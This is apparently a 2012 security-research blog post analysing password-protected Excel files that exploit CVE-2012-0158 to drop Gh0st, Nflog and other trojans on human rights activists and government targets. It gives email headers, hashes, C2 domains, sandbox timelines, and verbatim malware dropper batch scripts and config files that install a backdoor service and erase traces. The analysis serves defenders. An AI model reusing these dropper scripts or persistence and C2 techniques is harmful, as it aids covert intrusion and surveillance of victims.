CVE-2012-0158 generated "8861 password" XLS samples and analysis

August 9, 2012, 8:03 pm

≫ Next: Gauss samples - Nation-state cyber-surveillance + Banking trojan

Symantec recently posted an article by Joji Hamada titled "Password “8861” Used in Targeted Attacks", where the attackers continuously using the same passwords sent in emails together with the malicious attachment. Indeed, the password not only allows to evade detection but also makes it difficult to analyse the exploit itself.

All the samples i have that have this password appear to be created via a generator and share certain similarities. I will point out a few but you can find many more if you analyse the files and payloads.

- Exploit CVE-2012-0158

The hallmark ListView2, 1, 1, MSComctlLib, ListVieware clearly seen in the files, as well as excessive calls to MSCOMCTL.OCX during the dynamic analysis.

- Same password

8861 could be the attacker's lucky number, or it is job related, or being a primary number, it plays some role in the RSA encryption implementation in this generator ( this one perhaps is a bit far fetched, but not more than other theories)

- Antivirus/Malware detection

These files are mostly detected as Exploit.D-Encrypted by different AV vendors but this signature detects other malicious password protected documents - it is not limited to this 8861 generator files.

Yara Signatures: You can develop your own yara signatures based on these and other indicators you find in the files. I will share signatures on Yara Signature Exchange Google Group. If you are interested in making and sharing, please see DeepEnd Research: Yara Signature Exchange Google Group
IDS: Emerging threats IDS signatures - see below.

- Same file structure

They are each different sizes and have different payloads, however the first 120KB of each file are identical and are completley different from the headers of other typical user created password protected spreadsheets and other malicious and password protected XLS files. I will post two other malicious messages that were NOT generated using the same generator is seems and have a different password (I don't know password for those two files yet, if your figure it out, please share)

- Same document code page

Windows Simplified Chinese (PRC, Singapore)

- Same name for the dropped files (ews.exe and set.xls)

The dropped payload and the clean XLS document are different sizes, different types of malware for trojans, but have the same names (some are renamed after creation), which suggests a template. The embedded clean XLS documents have different metadata - I guess those were downloaded from internet or stolen from different targets - some were created on the Kingsoft version of Office, different authors, etc.

- Non default encryption (RC4, Microsoft RSA SChannel Cryptographic Provider).

Default is "Office 97/2000 compatible", which I think is 40-bit RC4 encryption. The generator is probably not using Excel interface but has it's own implementation of the encryption for the VBA code.

- Targets do not seem to be related by their occupation

Targets are in different countries - Japan, China, France and do not seem to be related by business or industry - human rights activists, businesses, politicians. This makes me think it is not the same group of attackers but it is just a generator purchased by/supplied to different groups attacking different targets. The same trojan types, C2 domains, and targets were covered on Contagio and other resources earlier.

CVE #

CVE-2012-0158

The (1) ListView, (2) ListView2, (3) TreeView, and (4) TreeView2 ActiveX controls in MSCOMCTL.OCX in the Common Controls in Microsoft Office 2003 SP3, 2007 SP2 and SP3, and 2010 Gold and SP1; Office 2003 Web Components SP3; SQL Server 2000 SP4, 2005 SP4, and 2008 SP2, SP3, and R2; BizTalk Server 2002 SP1; Commerce Server 2002 SP4, 2007 SP2, and 2009 Gold and R2; Visual FoxPro 8.0 SP1 and 9.0 SP2; and Visual Basic 6.0 Runtime allow remote attackers to execute arbitrary code via a crafted (a) web site, (b) Office document, or (c) .rtf file that triggers "system state" corruption, as exploited in the wild in April 2012, aka "MSCOMCTL.OCX RCE Vulnerability."

Download

Download all the Excel files plus payload files for #1 and 2 in a password protected archive (email me if you need the password)

Many thanks to anonymous for sharing. Payload data for other Excel files is coming soon.

Original Message

This is an example of a targeted message for one of the attachments (New Microsoft excel table.xls)

211.174.163.103 - poor reputation, spammer

http://www.projecthoneypot.org/ip_211.174.163.103

Received: from xxxxxxxxxxxxxxxx ([172.25.22.235]) by xxxxxxxxxxxxxxxxxx (xxxxxxxxxxxxx) (using TLSv1/SSLv3 with cipher AES256-SHA (256 bits)) for xxxxxxxxxxxxxxxxxxxx; Wed, 25 Jul 2012 09:43:21 +0200

Reply-To: <jiaoguobiao3@sina.com>

Received: from [172.25.18.171] (port=48602 helo=xxxxxxxxxxxx) by smtp-xxxxxxxxxxxxxxxxx with esmtp id 1StwFd-0002R0-KA for xxxxxxxxxxxxxxxxxxx; Wed, 25 Jul 2012 09:43:21 +0200

From: <jiaoguobiao3@sina.com>

Sender: <jiaoguobiao3@sina.com>

Received: from [172.25.18.133] (port=14641 helo=xxxxxxxxxxxxxxxxxxx) by xxxxxxxxxxxxxx with smtp id 1StwFd-0006Hi-74 for xxxxxxxxxxxxxxxxxxxx; Wed, 25 Jul 2012 09:43:21 +0200

To: xxxxxxxxxxxxx

Received: from (unknown [172.25.18.172]) by XXXXXXXXXXXX with smtp id XXXXXXXXXXXXX; Wed, 25 Jul 2012 09:43:19 +0200

Received: from [58.63.234.169] (port=26328 helo=mail234-169.sinamail.sina.com.cn) by XXXXXXXXXXXXXX with esmtp id 1StwFY-0000ms-HZ for XXXXXXXXXXX; Wed, 25 Jul 2012 09:43:20 +0200

X-Originating-IP: [211.174.163.103]

X-IronPort-Anti-Spam-Filtered: true

X-IronPort-Anti-Spam-Result: AlEDAKU/KE/TrqNn/3poAAyBUw

Received: from unknown (HELO webmail.sinamail.sina.com.cn) ([10.71.1.38]) by irgz1-219.sinamail.sina.com.cn with ESMTP; 25 Jul 2012 15:43:11 +0800

Received: by webmail.sinamail.sina.com.cn (Postfix, from userid 80) id 52B3F5F8035; Wed, 25 Jul 2012 15:43:11 +0800 (CST)

Date: Wed, 25 Jul 2012 15:43:11 +0800

Received: from jiaoguobiao3@sina.com([211.174.163.103]) by m1.mail.sina.com.cn via HTTP; Wed, 25 Jul 2012 15:43:11 +0800 (CST)

Content-Type: multipart/mixed;

boundary="----=_NextPart_000_001F_01CD6E72.04563CA0";

charset="gb2312"

Subject: Application

MIME-Version: 1.0

X-Priority: 3

X-MSMail-Priority: Normal

X-MessageID: 1343202191.3101.29137

X-Mailer: Sina WebMail 4.0

Message-ID: <20120725074311.52B3F5F8035@webmail.sinamail.sina.com.cn>

X-NAI-Spam-Flag: NO

X-NAI-Spam-Level: *

X-NAI-Spam-Threshold: 7

Importance: Normal

X-NAI-Spam-Score: 1.2

X-NAI-Spam-Report: 3 Rules triggered* 1 -- BODY_ONE_LINE_ATTACH_ONLY* 0.2 -- GEN_SPAM_FEATRE* 0 -- RV4289

X-NAI-Spam-Version: 2.2.0.9309 : core <4289> : streams <790053> : uri <1174304>

X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.6157

211.174.163.103

Host reachable, 265 ms. average

211.174.128.0 - 211.174.255.255

ELIMNET, INC.

Korea, Republic of

IP Administrator

Choongjungno3-Ka Seodaemoon-Gu

Elimnet Bldg, 32-11

phone: +82-2-3149-4923

noc@elim.net

File Information

"8861 GENERATOR" FILES (payload in some cases gets immediately renamed upon creation)

1. New Microsoft excel table.xls or 情况表.xls

Clean decoy set.xls: blank.

Message target: French Government and Chinese individuals

Payload ews.exe: b1d09374006e20fa795b2e70bf566c6d dropper for Gh0st trojan (not sure about the name)

SSDeep: 6144:dbL6vr7ZtpxBbi636Ls0b6HKqtAFCOjjBXa9/hcp8Rm:dbL6zdPxBb56LPDXa9/hiAm

9E82BA53F3D26E04207064ED8BDAA44A

2.qȐ}(24.7.1).xls

Clean decoy set.xls: a document related to Japanese manufacturing

Payload ews.exe: 0612B3138179852A416379B3E85742EA dropper for Trojan Nflog (see Contagio for the same trojan)

SSDeep:

3072:dbT46lL8vAyt1BIq5OO0ME+5pU5QDBbi2D36LsD4/D63/NB0C1jlEWHsOR:dbL6vr7ZtpxBbi636Ls0b6V6JWMOR

46AC122183C32858581E95EF40BD31B3

3. 240727.xls

Clean decoy set.xls: a Japanese document

Payload ews.exe: 63d7ad4f9a5e8ede0218bad6e8d5c2e6 dropper for Trojan Taidoor (see Contagio for the same trojan)

SSDeep 3072:dbT46lL8vAyt1BIq5OO0ME+5pU5QDBbi2D36LsD4/D63/nGpOiz3EX:dbL6vr7ZtpxBbi636Ls0b6P4O4K

7A0D5BB0CA9992826BAD0B2241C4992B

4. 8D823C0A3DADE8334B6C1974E2D6604F.xls

Clean decoy set.xls: a Japanese document

Payload ews.exe: 49F721DCA02C8F996C267DE26E2AA70C dropper for Trojan Nflog (see Contagio for the same trojan)

SSdeep: 3072:dbT46lL8vAyt1BIq5OO0ME+5pU5QDBbi2D36LsD4/D63/tGlbwwQJLsD4/D6E:dbL6vr7ZtpxBbi636Ls0b6HLLs0b6E

8D823C0A3DADE8334B6C1974E2D6604F

5. 2012日本外交の目標 The goal of Japan's diplomacy

Clean decoy set.xls: a Japanese document

Payload ews.exe e750d80055c38747aac5ac91bc0bd29d dropper for Trojan PoisonIvy

SSDeep 6144:dbL6vr7ZtpxBbi636Ls0b64/gbhwD/nv/LMezJUJwf:dbL6zdPxBb56LPzoa7nHLMezJUJG

6BB32CE95FBFAADAD19212080ED0268B

6. Seminiar.xls

Message target and set.xls: human rights activists in China

Payload ews.exe: dropper for Trojan RAT Lurk read about Lurk here http://www.commandfive.com/papers/C5_APT_C2InTheFifthDomain.pdf)

MD5 and sample currently unavailable

==============================

"NON - 8861" FILES for comparison - presumably malicious. Password unknown.

a .Dharamsala August 2012 Full program.xls 971f99af0f9df674a79507ed7b3010fb

b. EIDHR_action_plan.xlsx 0fe550a5d1187d38984c505ef7741638

Payload details

Kingsoft office metadata in the clean decoy file

# 1
1. New Microsoft excel table.xls or 情况表.xls

Clean decoy set.xls: blank.

Message target: French Government and Chinese individuals

Payload ews.exe: b1d09374006e20fa795b2e70bf566c6d dropper for Gh0st trojan (correct me if I am wrong)

SSDeep: 6144:dbL6vr7ZtpxBbi636Ls0b6HKqtAFCOjjBXa9/hcp8Rm:dbL6zdPxBb56LPDXa9/hiAm

9E82BA53F3D26E04207064ED8BDAA44A

File: iexplore.exe Size: 123932 MD5: b1d09374006e20fa795b2e70bf566c6d (VT 1/42)
File: set.xls Size: 7168 MD5: 726708CA086BF952266FADB9D655022D
File: srvlic.dll Size: 8704 MD5: 4a886c0f6e2c578207c2e26f9e452fae (VT 0/42)
File: keybyd.dat Size: 32768 MD5: 071cc2261ebcf789a447317778cdf048(VT 1/42)
File: Del.bat Size: 267 MD5: 12952BA491F972210EAB536942EB5075
File: syslog.dat Size: 1647 MD5: D1F2D54118CB4EB488A1340367E23268

Timeline and generated files.

file Write C:\Program Files\Microsoft Office\OFFICE11\EXCEL.EXE -> %Temp%\Excel8.0\MSComctlLib.exd
file Write C:\Program Files\Microsoft Office\OFFICE11\EXCEL.EXE -> %Temp%\set.xls
file Write C:\Program Files\Microsoft Office\OFFICE11\EXCEL.EXE -> %Temp%\ews.exe
file Write %Temp%\ews.exe -> %Application Data%\iexplore.exe
file Write %Temp%\ews.exe -> %Temp%\Del.bat
file Write %Temp%\ews.exe -> C:\WINDOWS\system32\srvlic.dll
file Write %Temp%\ews.exe -> %Temp%\keybyd.dat
file Write C:\WINDOWS\system32\cmd.exe - > \deleted_files\Del.bat
file Write %Application Data%\iexplore.exe -> %Temp%\syslog.dat
process terminated C:\WINDOWS\system32\cmd.exe -> ..OFFICE11\EXCEL.EXE
iexplore.exe gets renamed to text.dat

File strings and system calls suggest it is a version of Gh0st rat with keylog

Read here McAfee - Anatomy of a Gh0st Rat
Gh0st 3.6 source code (go up the path to see other files)

http://read.pudn.com/downloads112/sourcecode/delphi_control/470224/Server/svchost/common/KernelManager.cpp__.htm

%temp%Loop_KeyboardManager%temp%\keybyd.datLoop_HookKeyboard

Mutexes
Mutant NameProcess NameProcess ID
ShimCacheMutex iexplore.exe 1348 (iexplore.exe)
MutexObject iexplore.exe 1348 (iexplore.exe)

Registry change Created key

LOCAL MACHINE\SYSTEM\CurrentControlSet\Control\MediaResources\msvideo

File: Del.bat Size: 267 MD5: 12952BA491F972210EAB536942EB5075
Local Settings\Temp\Del.bat

noDesKfile

echo %time%>NUL

move "C:\DOCUME~1\Laura\LOCALS~1\Temp\ews.exe" C:\DOCUME~1\Laura\LOCALS~1\Temp\test.dat

if exist "C:\DOCUME~1\Laura\LOCALS~1\Temp\ews.exe" goto noDesKfile

del %0 && "C:\Documents and Settings\Laura\Application Data\iexplore.exe"

File: syslog.dat MD5: d1f2d54118cb4eb488a1340367e23268 Size: 1647

Ascii Strings:

--------------

ohPRSPORZORWBPQXV[XW[B1

KohohPRSPORZORWBPQXWRXPRB1

KohohPRSPORZORWBPQXWPXRZB1

Traffic (Download pcap here)

lixht.gnway.net
121.63.150.15
China
AS4134 Chinanet
CHINANET HUBEI PROVINCE NETWORK
netuser.dns1.us 27.22.117.26
China
AS4134 Chinanet
CHINANET HUBEI PROVINCE NETWORK

Historical data for these domains/IPS
first seen2012-05-21 13:39:03 -0000
last seen2012-05-21 13:39:03 -0000
netuser.dns1.us.A111.177.86.236

first seen2012-05-16 15:24:25 -0000
last seen2012-05-17 07:18:15 -0000
netuser.dns1.us.A111.177.86.240

#2

2. qȐ}(24.7.1).xls

Clean decoy set.xls: a document related to Japanese manufacturing

Payload ews.exe: 0612B3138179852A416379B3E85742EA dropper for Trojan Nflog (see Contagio for the same trojan)

SSDeep:

3072:dbT46lL8vAyt1BIq5OO0ME+5pU5QDBbi2D36LsD4/D63/NB0C1jlEWHsOR:dbL6vr7ZtpxBbi636Ls0b6V6JWMOR

46AC122183C32858581E95EF40BD31B3

Trojan Nflog was covered more than once before on Contagio and other sources. ET signatures exist for the traffic patterns http://lists.emergingthreats.net/pipermail/emerging-sigs/2012-February/017394.html.
The trojan collects all system logs and data and uploads them to C2 server in a very verbose form as you see below.

List of files

File: iexpl001.tmp Size: 25600 MD5: 0612B3138179852A416379B3E85742EA - main dropper
File: NfIpv6.ocx Size: 15360 MD5: D9A5A885E2A90088B7F94E094697A932
File: iexp.bat Size: 155 MD5: 61B07E9565745DFFE72C759BB8227B58
File: YahooCache.ini Size: 165 MD5: 1F38834AC81A382C22777C7A27432328 - config file
File: $NtUninstallKB942388$ MD5: c7a6c3a3bf556b011a4d40224e83d43d - system data
File: MSMAPI.OCX Size: 67072 MD5: A3D3B0686E7BD13293AD0E63EBEC67AF
File: CAServer.exe Size: 62976 MD5: 4FB872E0D0FC1A016C93C573A976D85D dropper for the backdoor service installer
File: ~mcd.dat Size: 0
File: IntelAMTPP.dll Size: 10485760 MD5: EBD1F5E471774BB283DE44E121EFA3E5 - backdoor service installer
File: Nfile.asp Size: 67080 MD5: 2866C12CE666D6B15FC6E32D968BA57B - downloaded binary - there is an 8 byte padding ( 36 37 30 37 32 00 D3 77 ) before the PE header, remove it and you get MD5: A3D3B0686E7BD13293AD0E63EBEC67AF - the main NFlog trojan

Abbreviated timeline and created files - including activities during stage 2 of the attack - Note the 2nd stage starts more than an hour after the infection

6/8/2012 1:43:22.142,"file","Write"	.\OFFICE11\EXCEL.EXE	->	\Local Settings\Temporary Internet Files\Content.MSO\E207C016.emf
6/8/2012 1:43:23.596,"file","Write"	.\OFFICE11\EXCEL.EXE	->	%Temp%\Excel8.0\MSComctlLib.exd
6/8/2012 1:43:37.830,"process","created"	%Temp%\ews.exe	->	\system32\cmd.exe
6/8/2012 1:43:32.486,"file","Write"	.\OFFICE11\EXCEL.EXE	->	%Temp%\set.xls
6/8/2012 1:43:32.549,"file","Write"	.\OFFICE11\EXCEL.EXE	->	%Temp%\ews.exe (gets renamed to iexpl001.tmp)
6/8/2012 1:43:33.190,"file","Write"	%Temp%\ews.exe	->	C:\WINDOWS\Temp\NfIpv6.ocx
6/8/2012 1:43:33.299,"file","Write"	%Temp%\ews.exe	->	C:\WINDOWS\Temp\YahooCache.ini
6/8/2012 1:44:3.987,"file","Write"	C:\WINDOWS\system32\svchost.exe	->	C:\Documents and Settings\NetworkService\IETldCache\index.dat
6/8/2012 1:44:13.81,"file","Write"	C:\WINDOWS\system32\svchost.exe	->	C:\WINDOWS\Temp\MSMAPI.OCX
6/8/2012 1:44:15.97,"process","created"	C:\WINDOWS\system32\svchost.exe	->	\system32\cmd.exe
6/8/2012 1:44:15.378,"process","created"	C:\WINDOWS\system32\cmd.exe	->	\system32\ipconfig.exe
6/8/2012 1:44:15.972,"process","terminate	C:\WINDOWS\system32\svchost.exe	->	\system32\cmd.exe
6/8/2012 1:44:15.972,"file","Write"	C:\WINDOWS\system32\svchost.exe	->	C:\WINDOWS\Temp\$NtUninstallKB942388$
6/8/2012 1:44:16.3,"process","created"	C:\WINDOWS\system32\svchost.exe	->	\system32\cmd.exe
6/8/2012 1:44:16.238,"process","created"	C:\WINDOWS\system32\cmd.exe	->	\system32\net.exe
6/8/2012 1:44:16.550,"process","created"	C:\WINDOWS\system32\net.exe	->	\system32\net1.exe
6/8/2012 1:44:17.128,"process","created"	C:\WINDOWS\system32\cmd.exe	->	\system32\tasklist.exe
6/8/2012 1:44:17.378,"process","created"	C:\WINDOWS\system32\svchost.exe	->	\system32\wbem\wmiprvse.exe
6/8/2012 1:44:18.394,"process","created"	C:\WINDOWS\system32\cmd.exe	->	\system32\systeminfo.exe
6/8/2012 1:44:22.878,"process","created"	C:\WINDOWS\system32\cmd.exe	->	\system32\netstat.exe
6/8/2012 1:45:21.925,"process","terminate	C:\WINDOWS\system32\svchost.exe	->	\system32\wbem\wmiprvse.exe
STAGE 2
6/8/2012 2:59:34.664,"file","Write"	C:\WINDOWS\system32\svchost.exe	->	C:\WINDOWS\Temp\MyTmpFile.Dat
6/8/2012 3:0:22.994,"file","Write"	C:\WINDOWS\system32\systeminfo.exe	->	C:\WINDOWS\Temp\~mcd.dat
6/8/2012 3:7:9.255,"file","Write"	C:\WINDOWS\system32\svchost.exe	->	C:\WINDOWS\CAServer.exe
6/8/2012 3:7:21.709,"file","Write"	C:\WINDOWS\system32\cmd.exe	->	C:\WINDOWS\Temp\~mcd.dat
6/8/2012 3:7:21.740,"process","terminated"	C:\WINDOWS\system32\svchost.exe	->	\system32\cmd.exe
6/8/2012 3:7:45.976,"process","created"	C:\WINDOWS\system32\svchost.exe	->	\system32\cmd.exe
6/8/2012 3:7:46.116,"process","created"	C:\WINDOWS\system32\cmd.exe	->	C:\WINDOWS\CAServer.exe
6/8/2012 3:7:48.257,"file","Write"	C:\WINDOWS\CAServer.exe	->	C:\Program Files\Common Files\Driver\IntelAMTPP.dll
6/8/2012 3:7:51.351,"file","Write"	C:\WINDOWS\CAServer.exe	->	C:\Program Files\Common Files\Driver\init.bat
6/8/2012 3:7:51.366,"process","created"	C:\WINDOWS\CAServer.exe	->	\system32\cmd.exe
6/8/2012 3:7:51.538,"file","Write"	C:\WINDOWS\CAServer.exe	->	C:\WINDOWS\Temp\iexp.bat
6/8/2012 3:7:51.616,"process","terminated"	C:\WINDOWS\system32\svchost.exe	->	\system32\cmd.exe
6/8/2012 3:7:51.820,"process","created"	C:\WINDOWS\system32\cmd.exe	->	\system32\rundll32.exe
6/8/2012 3:7:51.945,"process","created"	C:\WINDOWS\system32\cmd.exe	->	\system32\attrib.exe
6/8/2012 3:7:52.288,"file","Write"	C:\WINDOWS\system32\cmd.exe.	->	.\deleted_files\C\WINDOWS\CAServer.exe
6/8/2012 3:7:52.288,"file","Delete"	C:\WINDOWS\system32\cmd.exe	->	C:\WINDOWS\CAServer.exe
6/8/2012 3:7:52.351,"file","Write"	C:\WINDOWS\system32\cmd.exe.	->	.\deleted_files\C\WINDOWS\Temp\iexp.bat
6/8/2012 3:7:52.351,"file","Delete"	C:\WINDOWS\system32\cmd.exe	->	C:\WINDOWS\Temp\iexp.bat
6/8/2012 3:7:52.820,"process","created"	C:\WINDOWS\system32\net.exe	->	\system32\net1.exe
6/8/2012 3:7:52.945,"file","Write"	System	->	C:\PROGRA~1\COMMON~1\Driver\init.bat
6/8/2012 3:7:52.945,"file","Write","System	System	->	..\deleted_files\C\WINDOWS\CAServer.exe"
6/8/2012 3:7:53.54,"process","created"	C:\WINDOWS\system32\svchost.exe	->	\system32\cmd.exe
6/8/2012 3:7:53.242,"process","created"	C:\WINDOWS\system32\cmd.exe	->	\system32\ipconfig.exe
6/8/2012 3:7:53.945,"file","Write"	System	->	..\deleted_files\C\WINDOWS\Temp\iexp.bat"
6/8/2012 3:7:54.38,"process","terminated"	C:\WINDOWS\system32\cmd.exe	->	\system32\ipconfig.exe
6/8/2012 3:7:54.85,"process","terminated"	C:\WINDOWS\system32\svchost.exe	->	\system32\cmd.exe
6/8/2012 3:7:55.38,"process","terminated"	C:\WINDOWS\system32\net.exe	->	\system32\net1.exe
6/8/2012 3:7:55.54,"process","terminated"	C:\WINDOWS\system32\cmd.exe	->	\system32\net.exe
6/8/2012 3:7:55.70,"file","Write"	C:\WINDOWS\system32\cmd.exe	->	..\deleted_files\C\Program Files\Common Files\Driver\init.bat
6/8/2012 3:7:55.70,"file","Delete"	C:\WINDOWS\system32\cmd.exe	->	C:\Program Files\Common Files\Driver\init.bat
6/8/2012 3:7:55.101,"process","terminated"	C:\WINDOWS\CAServer.exe	->	\system32\cmd.exe
6/8/2012 3:7:55.945,"file","Write",	System	->	..\deleted_files\C\Program Files\Driver\init.bat"
6/8/2012 3:7:58.320,"file","Write"	C:\WINDOWS\system32\svchost.exe	->	%Local Settings%\Temporary Internet Files\Content.IE5\BWHA22TU\ct_datangcun_com[1]

Registry change - installation of WmdmPmSp service - more than an hour after the infection

Key Name: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WmdmPmSpData: Windows Infrared Port Monitor.HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Wmdm
Last Write Time: 8/6/2012 - 3:07 AMC:\Progra~1\common~1\Driver\IntelAMTPP.dll

File: iexpl001.tmp Size: 25600 MD5: 0612B3138179852A416379B3E85742EA

ASCI strings

00000162
\temp\
NfIpv6.ocx
SOFTWARE\MICROSOFT\Windows\CurrentVersion\Run
wmiprivse.exe
net start IPRIP
sc start iprip 'cmd' 1
/A /C
NfIpv6.ocx,RundllInstallA IPRIP
/A /C rundll32
ComSpec
cmd.exe
MSMAPI.OCX,RunProcGoA
MSMAPI.OCX
NfIpv6.ocx,RunInstallA
rundll32.exe
YahooCache.ini

File: YahooCache.ini Size: 165 MD5: 1F38834AC81A382C22777C7A27432328
Config file
[cpar]

m_ID=KH120719new*
m_Proc=SVCHOST.EXE
m_MainUrl=d3d3Lm1saXRqY2FiLmNvbQ==
m_BackUrl=d3d3Lm1saXRqY2FiLmNvbQ==
m_DllName=TVNNQVBJLk9DWA==
isFirst=notFirst

Bease64 encoded data in the config file

TVNNQVBJLk9DWA== MSMAPI.OCX d3d3Lm1saXRqY2FiLmNvbQ==www.mlitjcab.com

File: MSMAPI.OCX Size: 67072 MD5: A3D3B0686E7BD13293AD0E63EBEC67AF
ASCI strings

No cmd Info!0000000000000000000000000000000000000000%s:%d\cmd.exe /C dir "%userprofile%\recent\"net viewnetstat -ansysteminfotasklistnet startipconfig /all255.255.255.0AuthPortcparAddress\temp\YahooCache.inim_IDm_MainUrl

1000501C: 'SvcHostDLL.exe',0
10005050: 'RegSetValueEx(ServiceDll)',0
1000506C: 'ServiceDll',0
10005078: 'Parameters',0
10005084: 'RegCreateKeyA',0
10005094: 'Advapi32',0
100050A0: 'SYSTEM\CurrentControlSet\Services\',0
100050C4: 'Net address translation for IPv6 Protocol.',0
100050F0: 'IPv6 Stack Local Support',0
1000510C: '%SystemRoot%\System32\svchost.exe -k netsvcs',0
1000513C: 'netsvcs',0
10005144: 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost',0
1000517C: 'IPRIP',0
10005184: 'NfIpv6.ocx',0
10005190: 'NfcoreOk',0
1000519C: 'm_Proc',0
100051A4: 'm_DllName',0
100051B0: 'm_MainUrl',0
100051BC: 'm_BackUrl',0
100051C8: 'cpar',0
100051D0: 'm_ID',0
100051D8: 'YahooCache.ini',0
100051E8: 'NfLog/Nfile.asp',0
100051F8: 'GetFile',0
10005200: 'ProcGo',0
10005208: 'HTTP/1.1',0
10005214: 'Mozilla/5.0 (compatible; MSIE 7.0;Windows NT 5.1)',0
10005248: '%s:%d',0
10005250: 'Auth',0
10005258: 'Port',0
10005260: 'Address',0
1000526C: '\Temp\',0
10005274: 'InternetSetOptionA',0
10005288: 'InternetReadFile',0
1000529C: 'InternetOpenA',0
100052AC: 'InternetConnectA',0
100052C0: 'InternetCloseHandle',0
100052D4: 'HttpSendRequestA',0
100052E8: 'HttpQueryInfoA',0
100052F8: 'HttpOpenRequestA',0
1000530C: 'HttpEndRequestA',0
1000531C: 'wininet.dll',0
10005334: 'www.microsoft.com',0
10005350: 'Proxy-Authorization: Basic ',0
1000536C: 'HTTP://',0
10005374: 'HEAD',0
1000537C: 'POST',0

File: $NtUninstallKB942388$ MD5: c7a6c3a3bf556b011a4d40224e83d43d Size: 8591 - full systeminfo dump

Ascii Strings:
---------------------------------------------------------------------------
C:\WINDOWS\system32\ipconfig /all
Windows IP Configuration
Host Name . . . . . . . . . . . . : DellXT
Primary Dns Suffix . . . . . . . :
Node Type . . . . . . . . . . . . : Hybrid
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
DNS Suffix Search List. . . . . . : localdomain
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . : localdomain
Description . . . . . . . . . . . : VMware Accelerated AMD PCNet Adapter
Physical Address. . . . . . . . . : 00-50-56-3C-F6-41
Dhcp Enabled. . . . . . . . . . . : Yes
Autoconfiguration Enabled . . . . : Yes
IP Address. . . . . . . . . . . . : 192.168.106.141
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.106.2
DHCP Server . . . . . . . . . . . : 192.168.106.254
DNS Servers . . . . . . . . . . . : 192.168.106.2
Primary WINS Server . . . . . . . : 192.168.106.2
Lease Obtained. . . . . . . . . . : Monday, August 06, 2012 1:32:20 AM
Lease Expires . . . . . . . . . . : Monday, August 06, 2012 2:02:20 AM
C:\WINDOWS\system32\net start
These Windows services are started:
Application Layer Gateway Service
Bluetooth Support Service
COM+ Event System
Cryptographic Services
DCOM Server Process Launcher
DHCP Client
Distributed Link Tracking Client
DNS Client
Error Reporting Service
ESET Service
Event Log
[abbreviated]-----------------
Windows User Mode Driver Framework
Wireless Zero Configuration
Workstation
The command completed successfully.
C:\WINDOWS\system32\tasklist
Image Name PID Session Name Session# Mem Usage
========================= ====== ================ ======== ============
System Idle Process 0 Console 0 28 K
System 4 Console 0 240 K
smss.exe 552 Console 0 388 K
csrss.exe 624 Console 0 2,816 K
winlogon.exe 648 Console 0 3,128 K
[abbreviated]---------------
TPAutoConnect.exe 968 Console 0 4,528 K
ctfmon.exe 224 Console 0 3,044 K
cmd.exe 1056 Console 0 92 K
EXCEL.EXE 368 Console 0 11,640 K
cmd.exe 940 Console 0 2,316 K
tasklist.exe 276 Console 0 3,972 K
wmiprvse.exe 1468 Console 0 5,384 K
C:\WINDOWS\system32\systeminfo
Host Name: DELLXT
OS Name: Microsoft Windows XP Professional
OS Version: 5.1.2600 Service Pack 2 Build 2600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Uniprocessor Free
Registered Owner: admin
Registered Organization:
Product ID: 76487-641-3817835-23453
Original Install Date: 11/15/2011, 9:24:04 AM
System Up Time: 28 Days, 1 Hours, 5 Minutes, 19 Seconds
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System type: X86-based PC
Processor(s): 1 Processor(s) Installed.
[01]: x86 Family 6 Model 26 Stepping 5 GenuineIntel ~2660 Mhz
BIOS Version: INTEL - 6040000
Windows Directory: C:\WINDOWS
System Directory: C:\WINDOWS\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (GMT-05:00) Eastern Time (US & Canada)
Total Physical Memory: 1,023 MB
Available Physical Memory: 752 MB
Virtual Memory: Max Size: 2,048 MB
Virtual Memory: Available: 2,008 MB
Virtual Memory: In Use: 40 MB
Page File Location(s): C:\pagefile.sys
Domain: WUC
Logon Server: N/A
Hotfix(s): 3 Hotfix(s) Installed.
[01]: File 1
[02]: Q147222
[03]: KB911164 - Update
NetWork Card(s): 1 NIC(s) Installed.
[01]: VMware Accelerated AMD PCNet Adapter
Connection Name: Local Area Connection
DHCP Enabled: Yes
DHCP Server: 192.168.106.254
IP address(es)
[01]: 192.168.106.141
C:\WINDOWS\system32\netstat -an
Active Connections
Proto Local Address Foreign Address State
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING
TCP 127.0.0.1:1025 0.0.0.0:0 LISTENING
TCP 127.0.0.1:5152 0.0.0.0:0 LISTENING
TCP 127.0.0.1:5152 127.0.0.1:1036 CLOSE_WAIT
TCP 192.168.106.141:139 0.0.0.0:0 LISTENING
TCP 192.168.106.141:1065 64.4.11.42:80 ESTABLISHED
TCP 192.168.106.141:1066 112.175.245.222:80 ESTABLISHED
UDP 0.0.0.0:445 *:*
UDP 0.0.0.0:500 *:*
UDP 0.0.0.0:1032 *:*
UDP 0.0.0.0:4500 *:*
UDP 127.0.0.1:123 *:*
UDP 127.0.0.1:1900 *:*
UDP 192.168.106.141:123 *:*
UDP 192.168.106.141:137 *:*
UDP 192.168.106.141:138 *:*
UDP 192.168.106.141:1900 *:*
C:\WINDOWS\system32\net view
System error 6118 has occurred.
The list of servers for this workgroup is not currently available
C:\WINDOWS\system32\dir "%userprofile%\recent\"
The system cannot find the file specified.

Unicode Strings:

File: init.bat Size: 123 MD5: 729865A05053FC1A447694A6A6B943A1

@Echo off
rundll32.exe C:\Progra~1\common~1\Driver\IntelAMTPP.dll,RundllInstall WmdmPmSp
net start WmdmPmSp
del %0

File: iexp.bat Size: 155 MD5: 61B07E9565745DFFE72C759BB8227B58
@echo off
:selfkill
attrib -a -r -s -h "c:\windows\CAServer.exe"
del "c:\windows\CAServer.exe"
if exist "c:\windows\CAServer.exe" goto selfkill
del %0

\File: IntelAMTPP.dll Size: 10485760 MD5: EBD1F5E471774BB283DE44E121EFA3E5
This file is padded with zeros to 10MB to evade detection. I saw files padded up to 22-25 mb to avoid uploads to Virtustotal.

10006210: 'USER32.dll',0
10006220: 'ADVAPI32.dll',0
10006240: 'WININET.dll',0
